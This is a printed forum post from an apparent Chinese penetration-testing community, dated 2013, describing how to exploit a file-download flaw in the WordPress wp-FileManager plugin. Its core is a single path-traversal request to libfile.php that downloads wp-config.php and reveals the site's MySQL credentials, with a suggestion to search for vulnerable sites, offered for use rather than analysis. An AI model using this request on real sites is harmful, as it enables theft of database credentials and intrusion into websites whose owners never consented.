中国网络渗透测试联盟
标题:
WordPress-wp-FileManager-File-Download漏洞利用方法
[打印本页]
作者:
admin
时间:
2013-7-26 12:43
标题:
WordPress-wp-FileManager-File-Download漏洞利用方法
洞详解:
http://packetstormsecurity.com/f ... -File-Download.html
, l9 N6 p( ^- a) M
+ }# m2 c5 ~. g/ H& m6 O' L' v
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。
3 g- @) P, _) G4 A0 C- c$ U
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2